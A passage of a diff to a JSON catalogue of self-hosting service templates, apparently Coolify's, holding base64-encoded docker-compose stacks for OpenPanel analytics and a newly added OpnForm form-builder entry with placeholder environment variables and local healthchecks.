19TRUxGX0hPU1RFRD10cnVlCiAgICAgIC0gU0VSVklDRV9VUkxfT1BBUEkKICAgICAgLSAnTkVYVF9QVUJMSUNfQVBJX1VSTD0ke1NFUlZJQ0VfVVJMX09QQVBJfScKICAgICAgLSAnTkVYVF9QVUJMSUNfREFTSEJPQVJEX1VSTD0ke1NFUlZJQ0VfVVJMX09QREFTSEJPQVJEfScKICAgICAgLSAnREFUQUJBU0VfVVJMPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke09QRU5QQU5FTF9QT1NUR1JFU19EQjotb3BlbnBhbmVsLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtICdEQVRBQkFTRV9VUkxfRElSRUNUPXBvc3RncmVzOi8vJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVN9OiR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU31AcG9zdGdyZXM6NTQzMi8ke09QRU5QQU5FTF9QT1NUR1JFU19EQjotb3BlbnBhbmVsLWRifT9zY2hlbWE9cHVibGljJwogICAgICAtICdSRURJU19VUkw9cmVkaXM6Ly9kZWZhdWx0OiR7U0VSVklDRV9QQVNTV09SRF9SRURJU31AcmVkaXM6NjM3OScKICAgICAgLSAnQ0xJQ0tIT1VTRV9VUkw9aHR0cDovL2NsaWNraG91c2U6ODEyMy9vcGVucGFuZWwnCiAgICAgIC0gJ0NPT0tJRV9TRUNSRVQ9JHtTRVJWSUNFX0JBU0U2NF9DT09LSUVTRUNSRVR9JwogICAgICAtICdBTExPV19SRUdJU1RSQVRJT049JHtPUEVOUEFORUxfQUxMT1dfUkVHSVNUUkFUSU9OOi1mYWxzZX0nCiAgICAgIC0gJ0FMTE9XX0lOVklUQVRJT049JHtPUEVOUEFORUxfQUxMT1dfSU5WSVRBVElPTjotZmFsc2V9JwogICAgICAtICdFTUFJTF9TRU5ERVI9JHtPUEVOUEFORUxfRU1BSUxfU0VOREVSfScKICAgICAgLSAnUkVTRU5EX0FQSV9LRVk9JHtSRVNFTkRfQVBJX0tFWX0nCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBjbGlja2hvdXNlOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ2N1cmwgLWYgaHR0cDovL2xvY2FsaG9zdDozMDAwL2hlYWx0aGNoZWNrIHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1CiAgb3BlbnBhbmVsLXdvcmtlcjoKICAgIGltYWdlOiAnbGluZGVzdmFyZC9vcGVucGFuZWwtd29ya2VyOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtICdESVNBQkxFX0JVTExCT0FSRD0ke0RJU0FCTEVfQlVMTEJPQVJEOi0xfScKICAgICAgLSBOT0RFX0VOVj1wcm9kdWN0aW9uCiAgICAgIC0gTkVYVF9QVUJMSUNfU0VMRl9IT1NURUQ9dHJ1ZQogICAgICAtIFNFUlZJQ0VfVVJMX09QQlVMTEJPQVJECiAgICAgIC0gJ05FWFRfUFVCTElDX0FQSV9VUkw9JHtTRVJWSUNFX1VSTF9PUEFQSX0nCiAgICAgIC0gJ0RBVEFCQVNFX1VSTD1wb3N0Z3JlczovLyR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfToke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QHBvc3RncmVzOjU0MzIvJHtPUEVOUEFORUxfUE9TVEdSRVNfREI6LW9wZW5wYW5lbC1kYn0/c2NoZW1hPXB1YmxpYycKICAgICAgLSAnREFUQUJBU0VfVVJMX0RJUkVDVD1wb3N0Z3JlczovLyR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfToke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QHBvc3RncmVzOjU0MzIvJHtPUEVOUEFORUxfUE9TVEdSRVNfREI6LW9wZW5wYW5lbC1kYn0/c2NoZW1hPXB1YmxpYycKICAgICAgLSAnUkVESVNfVVJMPXJlZGlzOi8vZGVmYXVsdDoke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9QHJlZGlzOjYzNzknCiAgICAgIC0gJ0NMSUNLSE9VU0VfVVJMPWh0dHA6Ly9jbGlja2hvdXNlOjgxMjMvb3BlbnBhbmVsJwogICAgZGVwZW5kc19vbjoKICAgICAgb3BlbnBhbmVsLWFwaToKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBjbGlja2hvdXNlOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ2N1cmwgLWYgaHR0cDovL2xvY2FsaG9zdDozMDAwL2hlYWx0aGNoZWNrIHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1CiAgICAgIHN0YXJ0X3BlcmlvZDogNXMKICBwb3N0Z3JlczoKICAgIGltYWdlOiAncG9zdGdyZXM6MTYtYWxwaW5lJwogICAgdm9sdW1lczoKICAgICAgLSAnb3BlbnBhbmVsX3Bvc3RncmVzX2RhdGE6L3Zhci9saWIvcG9zdGdyZXNxbC9kYXRhJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1BPU1RHUkVTX0RCPSR7T1BFTlBBTkVMX1BPU1RHUkVTX0RCOi1vcGVucGFuZWwtZGJ9JwogICAgICAtICdQT1NUR1JFU19VU0VSPSR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQogIHJlZGlzOgogICAgaW1hZ2U6ICdyZWRpczo3LjQtYWxwaW5lJwogICAgdm9sdW1lczoKICAgICAgLSAnb3BlbnBhbmVsX3JlZGlzX2RhdGE6L2RhdGEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUkVESVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1JFRElTfScKICAgIGNvbW1hbmQ6ICdyZWRpcy1zZXJ2ZXIgLS1yZXF1aXJlcGFzcyAke1NFUlZJQ0VfUEFTU1dPUkRfUkVESVN9IC0tbWF4bWVtb3J5LXBvbGljeSBub2V2aWN0aW9uJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIHJlZGlzLWNsaQogICAgICAgIC0gJy1hJwogICAgICAgIC0gJyR7U0VSVklDRV9QQVNTV09SRF9SRURJU30nCiAgICAgICAgLSBwaW5nCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQogIGNsaWNraG91c2U6CiAgICBpbWFnZTogJ2NsaWNraG91c2UvY2xpY2tob3VzZS1zZXJ2ZXI6MjQuMy4yLWFscGluZScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ29wZW5wYW5lbF9jbGlja2hvdXNlX2RhdGE6L3Zhci9saWIvY2xpY2tob3VzZScKICAgICAgLSAnb3BlbnBhbmVsX2NsaWNraG91c2VfbG9nczovdmFyL2xvZy9jbGlja2hvdXNlLXNlcnZlcicKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vY2xpY2tob3VzZS1jb25maWcueG1sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2NsaWNraG91c2Utc2VydmVyL2NvbmZpZy5kL29wLWNvbmZpZy54bWwKICAgICAgICByZWFkX29ubHk6IHRydWUKICAgICAgICBjb250ZW50OiAiPGNsaWNraG91c2U+XG4gICAgPGxvZ2dlcj5cbiAgICAgICAgPGxldmVsPndhcm5pbmc8L2xldmVsPlxuICAgICAgICA8Y29uc29sZT50cnVlPC9jb25zb2xlPlxuICAgIDwvbG9nZ2VyPlxuICAgIDxrZWVwX2FsaXZlX3RpbWVvdXQ+MTA8L2tlZXBfYWxpdmVfdGltZW91dD5cbiAgICA8IS0tIFN0b3AgYWxsIHRoZSB1bm5lY2Vzc2FyeSBsb2dnaW5nIC0tPlxuICAgIDxxdWVyeV90aHJlYWRfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8cXVlcnlfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8dGV4dF9sb2cgcmVtb3ZlPVwicmVtb3ZlXCIvPlxuICAgIDx0cmFjZV9sb2cgcmVtb3ZlPVwicmVtb3ZlXCIvPlxuICAgIDxtZXRyaWNfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8YXN5bmNocm9ub3VzX21ldHJpY19sb2cgcmVtb3ZlPVwicmVtb3ZlXCIvPlxuICAgIDxzZXNzaW9uX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPHBhcnRfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8bGlzdGVuX2hvc3Q+MC4wLjAuMDwvbGlzdGVuX2hvc3Q+XG4gICAgPGludGVyc2VydmVyX2xpc3Rlbl9ob3N0PjAuMC4wLjA8L2ludGVyc2VydmVyX2xpc3Rlbl9ob3N0PlxuICAgIDxpbnRlcnNlcnZlcl9odHRwX2hvc3Q+b3BjaDwvaW50ZXJzZXJ2ZXJfaHR0cF9ob3N0PlxuICAgIDwhLS0gRGlzYWJsZSBjZ3JvdXAgbWVtb3J5IG9ic2VydmVyIC0tPlxuICAgIDxjZ3JvdXBzX21lbW9yeV91c2FnZV9vYnNlcnZlcl93YWl0X3RpbWU+MDwvY2dyb3Vwc19tZW1vcnlfdXNhZ2Vfb2JzZXJ2ZXJfd2FpdF90aW1lPlxuICAgIDwhLS0gTm90IHVzZWQgYW55bW9yZSwgYnV0IGtlcHQgZm9yIGJhY2t3YXJkcyBjb21wYXRpYmlsaXR5IC0tPlxuICAgIDxtYWNyb3M+XG4gICAgICAgIDxzaGFyZD4xPC9zaGFyZD5cbiAgICAgICAgPHJlcGxpY2E+cmVwbGljYTE8L3JlcGxpY2E+XG4gICAgICAgIDxjbHVzdGVyPm9wZW5wYW5lbF9jbHVzdGVyPC9jbHVzdGVyPlxuICAgIDwvbWFjcm9zPlxuPC9jbGlja2hvdXNlPiIKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vY2xpY2tob3VzZS11c2VyLWNvbmZpZy54bWwKICAgICAgICB0YXJnZXQ6IC9ldGMvY2xpY2tob3VzZS1zZXJ2ZXIvdXNlcnMuZC9vcC11c2VyLWNvbmZpZy54bWwKICAgICAgICByZWFkX29ubHk6IHRydWUKICAgICAgICBjb250ZW50OiAiPGNsaWNraG91c2U+XG4gICAgPHByb2ZpbGVzPlxuICAgICAgICA8ZGVmYXVsdD5cbiAgICAgICAgICAgIDxsb2dfcXVlcmllcz4wPC9sb2dfcXVlcmllcz5cbiAgICAgICAgICAgIDxsb2dfcXVlcnlfdGhyZWFkcz4wPC9sb2dfcXVlcnlfdGhyZWFkcz5cbiAgICAgICAgPC9kZWZhdWx0PlxuICAgIDwvcHJvZmlsZXM+XG48L2NsaWNraG91c2U+XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2luaXQtZGIuc2gKICAgICAgICB0YXJnZXQ6IC9kb2NrZXItZW50cnlwb2ludC1pbml0ZGIuZC9pbml0LWRiLnNoCiAgICAgICAgY29udGVudDogIiMhL2Jpbi9zaFxuc2V0IC1lXG5cbmNsaWNraG91c2UgY2xpZW50IC1uIDw8LUVPU1FMXG4gIENSRUFURSBEQVRBQkFTRSBJRiBOT1QgRVhJU1RTIG9wZW5wYW5lbDtcbkVPU1FMIgogICAgdWxpbWl0czoKICAgICAgbm9maWxlOgogICAgICAgIHNvZnQ6IDI2MjE0NAogICAgICAgIGhhcmQ6IDI2MjE0NAogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdjbGlja2hvdXNlLWNsaWVudCAtLXF1ZXJ5ICJTRUxFQ1QgMSInCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQo=", "tags": [ "analytics", "insights", @@ -3054,6 +3068,26 @@ "minversion": "0.0.0", "port": "3000" }, + "opnform": { + "documentation": "https://docs.opnform.com/introduction?utm_source=coolify.io", + "slogan": "OpnForm is an open-source form builder that lets you create beautiful forms and share them anywhere. It's super fast, you don't need to know how to code", + "compose": "eC1zaGFyZWQtZW52OgogIEFQUF9OQU1FOiBPcG5Gb3JtCiAgQVBQX0VOVjogcHJvZHVjdGlvbgogIEFQUF9LRVk6ICcke1NFUlZJQ0VfQkFTRTY0X0FQSUtFWX0nCiAgQVBQX0RFQlVHOiAnJHtBUFBfREVCVUc6LWZhbHNlfScKICBBUFBfVVJMOiAnJHtTRVJWSUNFX1VSTF9OR0lOWH0nCiAgTE9HX0NIQU5ORUw6IGVycm9ybG9nCiAgTE9HX0xFVkVMOiAnJHtMT0dfTEVWRUw6LWRlYnVnfScKICBGSUxFU1lTVEVNX0RSSVZFUjogJyR7RklMRVNZU1RFTV9EUklWRVI6LWxvY2FsfScKICBMT0NBTF9GSUxFU1lTVEVNX1ZJU0lCSUxJVFk6IHB1YmxpYwogIENBQ0hFX0RSSVZFUjogcmVkaXMKICBRVUVVRV9DT05ORUNUSU9OOiByZWRpcwogIFNFU1NJT05fRFJJVkVSOiByZWRpcwogIFNFU1NJT05fTElGRVRJTUU6IDEyMAogIE1BSUxfTUFJTEVSOiAnJHtNQUlMX01BSUxFUjotbG9nfScKICBNQUlMX0hPU1Q6ICcke01BSUxfSE9TVH0nCiAgTUFJTF9QT1JUOiAnJHtNQUlMX1BPUlR9JwogIE1BSUxfVVNFUk5BTUU6ICcke01BSUxfVVNFUk5BTUU6LXlvdXJAZW1haWwuY29tfScKICBNQUlMX1BBU1NXT1JEOiAnJHtNQUlMX1BBU1NXT1JEfScKICBNQUlMX0VOQ1JZUFRJT046ICcke01BSUxfRU5DUllQVElPTn0nCiAgTUFJTF9GUk9NX0FERFJFU1M6ICcke01BSUxfRlJPTV9BRERSRVNTOi15b3VyQGVtYWlsLmNvbX0nCiAgTUFJTF9GUk9NX05BTUU6ICcke01BSUxfRlJPTV9OQU1FOi1PcG5Gb3JtfScKICBBV1NfQUNDRVNTX0tFWV9JRDogJyR7QVdTX0FDQ0VTU19LRVlfSUR9JwogIEFXU19TRUNSRVRfQUNDRVNTX0tFWTogJyR7QVdTX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICBBV1NfREVGQVVMVF9SRUdJT046ICcke0FXU19ERUZBVUxUX1JFR0lPTjotdXMtZWFzdC0xfScKICBBV1NfQlVDS0VUOiAnJHtBV1NfQlVDS0VUfScKICBPUEVOX0FJX0FQSV9LRVk6ICcke09QRU5fQUlfQVBJX0tFWX0nCiAgVEVMRUdSQU1fQk9UX0lEOiAnJHtURUxFR1JBTV9CT1RfSUR9JwogIFRFTEVHUkFNX0JPVF9UT0tFTjogJyR7VEVMRUdSQU1fQk9UX1RPS0VOfScKICBSRURJU19IT1NUOiByZWRpcwogIFJFRElTX1BBU1NXT1JEOiAnJHtTRVJWSUNFX1BBU1NXT1JEXzY0X1JFRElTfScKICBEQl9IT1NUOiBwb3N0Z3Jlc3FsCiAgREJfREFUQUJBU0U6ICcke1BPU1RHUkVTUUxfREFUQUJBU0U6LW9wbmZvcm19JwogIERCX1VTRVJOQU1FOiAnJHtTRVJWSUNFX1VTRVJfUE9TVEdSRVNRTH0nCiAgREJfUEFTU1dPUkQ6ICcke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVNRTH0nCiAgREJfQ09OTkVDVElPTjogcGdzcWwKICBQSFBfTUVNT1JZX0xJTUlUOiAxRwogIFBIUF9NQVhfRVhFQ1VUSU9OX1RJTUU6ICc2MDAnCiAgUEhQX1VQTE9BRF9NQVhfRklMRVNJWkU6IDY0TQogIFBIUF9QT1NUX01BWF9TSVpFOiA2NE0Kc2VydmljZXM6CiAgb3BuZm9ybS1hcGk6CiAgICBpbWFnZTogJ2podW1hbmovb3BuZm9ybS1hcGk6MS4xMi4xJwogICAgdm9sdW1lczoKICAgICAgLSAnYXBpLXN0b3JhZ2U6L3Vzci9zaGFyZS9uZ2lueC9odG1sL3N0b3JhZ2UnCiAgICBlbnZpcm9ubWVudDoKICAgICAgQVBQX05BTUU6IE9wbkZvcm0KICAgICAgQVBQX0VOVjogcHJvZHVjdGlvbgogICAgICBBUFBfS0VZOiAnJHtTRVJWSUNFX0JBU0U2NF9BUElLRVl9JwogICAgICBBUFBfREVCVUc6ICcke0FQUF9ERUJVRzotZmFsc2V9JwogICAgICBBUFBfVVJMOiAnJHtTRVJWSUNFX1VSTF9OR0lOWH0nCiAgICAgIExPR19DSEFOTkVMOiBlcnJvcmxvZwogICAgICBMT0dfTEVWRUw6ICcke0xPR19MRVZFTDotZGVidWd9JwogICAgICBGSUxFU1lTVEVNX0RSSVZFUjogJyR7RklMRVNZU1RFTV9EUklWRVI6LWxvY2FsfScKICAgICAgTE9DQUxfRklMRVNZU1RFTV9WSVNJQklMSVRZOiBwdWJsaWMKICAgICAgQ0FDSEVfRFJJVkVSOiByZWRpcwogICAgICBRVUVVRV9DT05ORUNUSU9OOiByZWRpcwogICAgICBTRVNTSU9OX0RSSVZFUjogcmVkaXMKICAgICAgU0VTU0lPTl9MSUZFVElNRTogMTIwCiAgICAgIE1BSUxfTUFJTEVSOiAnJHtNQUlMX01BSUxFUjotbG9nfScKICAgICAgTUFJTF9IT1NUOiAnJHtNQUlMX0hPU1R9JwogICAgICBNQUlMX1BPUlQ6ICcke01BSUxfUE9SVH0nCiAgICAgIE1BSUxfVVNFUk5BTUU6ICcke01BSUxfVVNFUk5BTUU6LXlvdXJAZW1haWwuY29tfScKICAgICAgTUFJTF9QQVNTV09SRDogJyR7TUFJTF9QQVNTV09SRH0nCiAgICAgIE1BSUxfRU5DUllQVElPTjogJyR7TUFJTF9FTkNSWVBUSU9OfScKICAgICAgTUFJTF9GUk9NX0FERFJFU1M6ICcke01BSUxfRlJPTV9BRERSRVNTOi15b3VyQGVtYWlsLmNvbX0nCiAgICAgIE1BSUxfRlJPTV9OQU1FOiAnJHtNQUlMX0ZST01fTkFNRTotT3BuRm9ybX0nCiAgICAgIEFXU19BQ0NFU1NfS0VZX0lEOiAnJHtBV1NfQUNDRVNTX0tFWV9JRH0nCiAgICAgIEFXU19TRUNSRVRfQUNDRVNTX0tFWTogJyR7QVdTX1NFQ1JFVF9BQ0NFU1NfS0VZfScKICAgICAgQVdTX0RFRkFVTFRfUkVHSU9OOiAnJHtBV1NfREVGQVVMVF9SRUdJT046LXVzLWVhc3QtMX0nCiAgICAgIEFXU19CVUNLRVQ6ICcke0FXU19CVUNLRVR9JwogICAgICBPUEVOX0FJX0FQSV9LRVk6ICcke09QRU5fQUlfQVBJX0tFWX0nCiAgICAgIFRFTEVHUkFNX0JPVF9JRDogJyR7VEVMRUdSQU1fQk9UX0lEfScKICAgICAgVEVMRUdSQU1fQk9UX1RPS0VOOiAnJHtURUxFR1JBTV9CT1RfVE9LRU59JwogICAgICBSRURJU19IT1NUOiByZWRpcwogICAgICBSRURJU19QQVNTV09SRDogJyR7U0VSVklDRV9QQVNTV09SRF82NF9SRURJU30nCiAgICAgIERCX0hPU1Q6IHBvc3RncmVzcWwKICAgICAgREJfREFUQUJBU0U6ICcke1BPU1RHUkVTUUxfREFUQUJBU0U6LW9wbmZvcm19JwogICAgICBEQl9VU0VSTkFNRTogJyR7U0VSVklDRV9VU0VSX1BPU1RHUkVTUUx9JwogICAgICBEQl9QQVNTV09SRDogJyR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU1FMfScKICAgICAgREJfQ09OTkVDVElPTjogcGdzcWwKICAgICAgUEhQX01FTU9SWV9MSU1JVDogMUcKICAgICAgUEhQX01BWF9FWEVDVVRJT05fVElNRTogJzYwMCcKICAgICAgUEhQX1VQTE9BRF9NQVhfRklMRVNJWkU6IDY0TQogICAgICBQSFBfUE9TVF9NQVhfU0laRTogNjRNCiAgICAgIEpXVF9UVEw6ICcke0pXVF9UVEw6LTE0NDB9JwogICAgICBKV1RfU0VDUkVUOiAnJHtTRVJWSUNFX1BBU1NXT1JEX0pXVFNFQ1JFVH0nCiAgICAgIEpXVF9TS0lQX0lQX1VBX1ZBTElEQVRJT046ICcke0pXVF9TS0lQX0lQX1VBX1ZBTElEQVRJT046LXRydWV9JwogICAgICBIX0NBUFRDSEFfU0lURV9LRVk6ICcke0hfQ0FQVENIQV9TSVRFX0tFWX0nCiAgICAgIEhfQ0FQVENIQV9TRUNSRVRfS0VZOiAnJHtIX0NBUFRDSEFfU0VDUkVUX0tFWX0nCiAgICAgIFJFX0NBUFRDSEFfU0lURV9LRVk6ICcke1JFX0NBUFRDSEFfU0lURV9LRVl9JwogICAgICBSRV9DQVBUQ0hBX1NFQ1JFVF9LRVk6ICcke1JFX0NBUFRDSEFfU0VDUkVUX0tFWX0nCiAgICAgIFNIT1dfT0ZGSUNJQUxfVEVNUExBVEVTOiAnJHtTSE9XX09GRklDSUFMX1RFTVBMQVRFUzotdHJ1ZX0nCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3Jlc3FsOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BocCAvdXNyL3NoYXJlL25naW54L2h0bWwvYXJ0aXNhbiBhYm91dCB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTVzCiAgICAgIHJldHJpZXM6IDMKICAgICAgc3RhcnRfcGVyaW9kOiA2MHMKICBhcGktd29ya2VyOgogICAgaW1hZ2U6ICdqaHVtYW5qL29wbmZvcm0tYXBpOjEuMTIuMScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2FwaS1zdG9yYWdlOi91c3Ivc2hhcmUvbmdpbngvaHRtbC9zdG9yYWdlJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIEFQUF9OQU1FOiBPcG5Gb3JtCiAgICAgIEFQUF9FTlY6IHByb2R1Y3Rpb24KICAgICAgQVBQX0tFWTogJyR7U0VSVklDRV9CQVNFNjRfQVBJS0VZfScKICAgICAgQVBQX0RFQlVHOiAnJHtBUFBfREVCVUc6LWZhbHNlfScKICAgICAgQVBQX1VSTDogJyR7U0VSVklDRV9VUkxfTkdJTlh9JwogICAgICBMT0dfQ0hBTk5FTDogZXJyb3Jsb2cKICAgICAgTE9HX0xFVkVMOiAnJHtMT0dfTEVWRUw6LWRlYnVnfScKICAgICAgRklMRVNZU1RFTV9EUklWRVI6ICcke0ZJTEVTWVNURU1fRFJJVkVSOi1sb2NhbH0nCiAgICAgIExPQ0FMX0ZJTEVTWVNURU1fVklTSUJJTElUWTogcHVibGljCiAgICAgIENBQ0hFX0RSSVZFUjogcmVkaXMKICAgICAgUVVFVUVfQ09OTkVDVElPTjogcmVkaXMKICAgICAgU0VTU0lPTl9EUklWRVI6IHJlZGlzCiAgICAgIFNFU1NJT05fTElGRVRJTUU6IDEyMAogICAgICBNQUlMX01BSUxFUjogJyR7TUFJTF9NQUlMRVI6LWxvZ30nCiAgICAgIE1BSUxfSE9TVDogJyR7TUFJTF9IT1NUfScKICAgICAgTUFJTF9QT1JUOiAnJHtNQUlMX1BPUlR9JwogICAgICBNQUlMX1VTRVJOQU1FOiAnJHtNQUlMX1VTRVJOQU1FOi15b3VyQGVtYWlsLmNvbX0nCiAgICAgIE1BSUxfUEFTU1dPUkQ6ICcke01BSUxfUEFTU1dPUkR9JwogICAgICBNQUlMX0VOQ1JZUFRJT046ICcke01BSUxfRU5DUllQVElPTn0nCiAgICAgIE1BSUxfRlJPTV9BRERSRVNTOiAnJHtNQUlMX0ZST01fQUREUkVTUzoteW91ckBlbWFpbC5jb219JwogICAgICBNQUlMX0ZST01fTkFNRTogJyR7TUFJTF9GUk9NX05BTUU6LU9wbkZvcm19JwogICAgICBBV1NfQUNDRVNTX0tFWV9JRDogJyR7QVdTX0FDQ0VTU19LRVlfSUR9JwogICAgICBBV1NfU0VDUkVUX0FDQ0VTU19LRVk6ICcke0FXU19TRUNSRVRfQUNDRVNTX0tFWX0nCiAgICAgIEFXU19ERUZBVUxUX1JFR0lPTjogJyR7QVdTX0RFRkFVTFRfUkVHSU9OOi11cy1lYXN0LTF9JwogICAgICBBV1NfQlVDS0VUOiAnJHtBV1NfQlVDS0VUfScKICAgICAgT1BFTl9BSV9BUElfS0VZOiAnJHtPUEVOX0FJX0FQSV9LRVl9JwogICAgICBURUxFR1JBTV9CT1RfSUQ6ICcke1RFTEVHUkFNX0JPVF9JRH0nCiAgICAgIFRFTEVHUkFNX0JPVF9UT0tFTjogJyR7VEVMRUdSQU1fQk9UX1RPS0VOfScKICAgICAgUkVESVNfSE9TVDogcmVkaXMKICAgICAgUkVESVNfUEFTU1dPUkQ6ICcke1NFUlZJQ0VfUEFTU1dPUkRfNjRfUkVESVN9JwogICAgICBEQl9IT1NUOiBwb3N0Z3Jlc3FsCiAgICAgIERCX0RBVEFCQVNFOiAnJHtQT1NUR1JFU1FMX0RBVEFCQVNFOi1vcG5mb3JtfScKICAgICAgREJfVVNFUk5BTUU6ICcke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU1FMfScKICAgICAgREJfUEFTU1dPUkQ6ICcke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVNRTH0nCiAgICAgIERCX0NPTk5FQ1RJT046IHBnc3FsCiAgICAgIFBIUF9NRU1PUllfTElNSVQ6IDFHCiAgICAgIFBIUF9NQVhfRVhFQ1VUSU9OX1RJTUU6ICc2MDAnCiAgICAgIFBIUF9VUExPQURfTUFYX0ZJTEVTSVpFOiA2NE0KICAgICAgUEhQX1BPU1RfTUFYX1NJWkU6IDY0TQogICAgY29tbWFuZDoKICAgICAgLSBwaHAKICAgICAgLSBhcnRpc2FuCiAgICAgIC0gJ3F1ZXVlOndvcmsnCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3Jlc3FsOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gInBncmVwIC1mICdwaHAgYXJ0aXNhbiBxdWV1ZTp3b3JrJyA+IC9kZXYvbnVsbCB8fCBleGl0IDEiCiAgICAgIGludGVydmFsOiA2MHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDMKICAgICAgc3RhcnRfcGVyaW9kOiAzMHMKICBhcGktc2NoZWR1bGVyOgogICAgaW1hZ2U6ICdqaHVtYW5qL29wbmZvcm0tYXBpOjEuMTIuMScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2FwaS1zdG9yYWdlOi91c3Ivc2hhcmUvbmdpbngvaHRtbC9zdG9yYWdlJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIEFQUF9OQU1FOiBPcG5Gb3JtCiAgICAgIEFQUF9FTlY6IHByb2R1Y3Rpb24KICAgICAgQVBQX0tFWTogJyR7U0VSVklDRV9CQVNFNjRfQVBJS0VZfScKICAgICAgQVBQX0RFQlVHOiAnJHtBUFBfREVCVUc6LWZhbHNlfScKICAgICAgQVBQX1VSTDogJyR7U0VSVklDRV9VUkxfTkdJTlh9JwogICAgICBMT0dfQ0hBTk5FTDogZXJyb3Jsb2cKICAgICAgTE9HX0xFVkVMOiAnJHtMT0dfTEVWRUw6LWRlYnVnfScKICAgICAgRklMRVNZU1RFTV9EUklWRVI6ICcke0ZJTEVTWVNURU1fRFJJVkVSOi1sb2NhbH0nCiAgICAgIExPQ0FMX0ZJTEVTWVNURU1fVklTSUJJTElUWTogcHVibGljCiAgICAgIENBQ0hFX0RSSVZFUjogcmVkaXMKICAgICAgUVVFVUVfQ09OTkVDVElPTjogcmVkaXMKICAgICAgU0VTU0lPTl9E